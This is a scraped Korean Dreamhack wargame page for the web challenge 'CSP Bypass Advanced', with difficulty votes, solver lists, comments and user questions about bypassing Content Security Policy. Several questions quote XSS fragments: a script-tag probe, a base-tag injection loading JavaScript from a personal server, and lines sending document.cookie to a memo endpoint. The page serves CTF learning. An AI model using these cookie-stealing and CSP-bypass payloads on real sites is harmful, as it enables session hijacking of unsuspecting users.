학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 3
CSP Bypass Advanced
web
1728
636
로그인 하고 문제 풀기
문제 정보
풀이
36
난이도 투표
95
질문
22
최근 풀이자
636
댓글
33
문제 설명
Description
Exercise: CSP Bypass의 패치된 문제입니다.
문제 수정 내역
2023.08.07 Dockerfile 제공
Translate
출제자 정보
Dreamhack
대표 업적 없음
2022.03.31. 11:52:57
First Blood!
as3617
워게임 고인물
출제된 지
3시간
만에 풀이 완료!
난이도 투표
95
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 19
yitzhak
암호학 입문
LEVEL 4에 투표했습니다.
1개월 전
even
대표 업적 없음
LEVEL 4에 투표했습니다.
1개월 전
newbiw
대표 업적 없음
LEVEL 5에 투표했습니다.
1개월 전
gongjae
컴퍼니
LEVEL 3에 투표했습니다.
2개월 전
JJ3rry
CTF 초보자
LEVEL 3에 투표했습니다.
3개월 전
질문
21
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
문제 방향 질문입니다.
nonce를 통해 문제를 푸는거같은데 강의를 보면 정적파일에 접속하여 캐시를 저장후 해당 nonce값을 통해 문제를 푸는 방향인거 같은데 /vuln/static/css/bootstrap.min.css 으로 접속 시 404에러가 뜨고 새로고침 시 응답값에 nonce값은 고정이 되지 않는데 잘못된 방향으로 풀고 있는걸까요?
UseeGod
답변
1
추천
3
2년 전
살려주세요
<script src=/vuln?param=<script>alert(1)</script>></script> 대략 이런식으로 vuln 페이지에서 테스트 해보았을때 html 코드를 받아와 작동이 안되는 것같습니다. script 태그의 type 도 혹시나하여 text/html 로 변경해 보았는데 실패했습니다. 문제가 아예 지전이 없네요 힌트등.. 도움을 주시면 감사하겠습니다.
하면된다
답변
1
추천
3
2년 전
문제 질문입니다
궁금한게 이 문제는 강의에 있는 내용만 가지고도 풀 수 있는 문제인가요? Vuln.html 파일을 제공한 이유가 |safe 가 있는 것을 보여 줄려고 그런건지 아님 문제 풀이에 다른 힌트가 있어서 그런건지 알고 싶습니다
비온데이
답변
2
추천
3
3년 전
도와주세요.
질문이랑 문제 참고해서 뭔가 계속 검색해가면서 보는데 더 미궁에 빠져들어서 일주일째 못풀고 있습니다. 힌트 좀 부탁드립니다.. base-uri 미지정 부분을 이용해서 푸는 문제 같아서 여기에 집중해봤는데 이제는 아닌거 같아요.
Helord
답변
1
추천
3
2년 전
질문드립니다
응답 값을 통해 설정된 CSP 값들을 확인하였을때, 설정이 안된 딱 한가지 옵션이 있더라구요 그 옵션을 이용하여, 개인 서버를 이용하여 푸는 방식을 생각 중인데 이 방향이 맞는지 잘 모르겠습니다.. 아니면 혹시 <meta> 태그를 사용해서 sha-256에 대한 설정을 주어 스크립트를 구동시키는 건가요..? 방향에 대한 조언 부탁드립니다ㅠㅠ..
감자탕
답변
1
추천
3
3년 전
nonce
nonce를 이용하는 문제인 거 같은데 ㅠㅠㅠ nonce를 예측해서 스크립트를 실행하는게 맞는 건가요?
mazino
답변
1
추천
3
2년 전
질문드립니다.
location href 사용시 두개가 동일하다고 생각했는데 아래꺼만 동작하는 이유가 뭔지 궁금합니다...!! location.href = "http://host3.dreamhack.games:18374/memo?memo="+document.cookie location.href = "http://127.0.0.1:8000/memo?=memo"+document.cookie
glasses96
답변
1
추천
2
2년 전
질문드립니다..
강의에 나온대로 base-uri방식으로 진행하려 하는데 잘 안되네요..개인 서버에 static/js 경로에 jquery.min.js파일을 만들고 base태그를 사용해서 <script src="/vuln?param='<base href='http://IP_addr/'>'"> <base href='http://IP_addr/'> 두 방법으로 시도했는데 잘 안되네요.. 스크립트 파일 안에는 document.location='http://host3.dreamhack.games:port/memo?memo='+document.cookie같이 작성했습니다.. 혹시 이 부분에서 잘못된것이 있을까요 아니면 방향이 틀린걸까요..ㅜ
SuuuuuuuuuK
답변
1
추천
2
2년 전
질문드립니다
vuln 페이지에서 base 태그로 개인 서버의 자바스크립트 실행해서 memo에 빈칸 나오는 것 까지는 확인햇습니다 그런데 flag 페이지에서는 계속 wrong이 뜨네요... 그리고 자바스크립트 파일에 코드를 밑에처럼 넣으면 안되는 이유가 무엇인가요? location.href = "http://host3.dreamhack.games:{port}/memo?memo="+document.cookie
Judol
답변
0
추천
1
1년 전
해당 문제에서 nonce의 기능
해당 문제를 base uri를 이용하는 방식으로 풀었는데, vuln페이지에 있는 nonce 속성은 어떻게 기능하기에 왜 들어간 건가요? 해당 문제에서 nonce가 차지하는 부분은 없다고 봐도 무방한가요?
reiki
답변
1
추천
1
4개월 전
«
‹
1
2
3
›
»
최근 풀이자
636
다아
대표 업적 없음
7시간 전
theori
강의 수강: 1
9시간 전
Cipher
Cloud 9
15시간 전
23조민지
대표 업적 없음
1일 전
스우스우1
Dreamhack CTF S6 II - Div2 참여
2일 전
yeando
대표 업적 없음
2일 전
eunginius
대표 업적 없음
2일 전
usgnim
대표 업적 없음
2일 전
항붕이
대표 업적 없음
2일 전
teddy bear
대표 업적 없음
2일 전
«
‹
1
2
3
4
5
›
»
댓글
33
Severus
대표 업적 없음
6일 전
요이
Translate
pip3
대표 업적 없음
5개월 전
이중공유기 이슈
Translate
O_F
대표 업적 없음
1년 전
새로웠습니다.
Translate
isotope
대표 업적 없음
1년 전
repl.it도 좋은 서버 도구네요.
Translate
여갱
대표 업적 없음
1년 전
어려워요
Translate
연님
답변 등록: 1
1년 전
따봉
Translate
Finder
웹해킹 입문
1년 전
개인서버를 사용해야한다
Translate
buaii
워게임 고인물
1년 전
풀고나면 눈이 번쩍 뜨이는 문제
Translate
One_
큐레이터
2년 전
https://깃헙아이디.github.io/ 요거 써서도 해결 가능!
Translate
JalniK
강의 수강: 1
2년 전
그 전 강의를 잘 이해하셨다면 쉬운 문제였습니다.
Translate
«
‹
1
2
3
4
›
»
댓글 33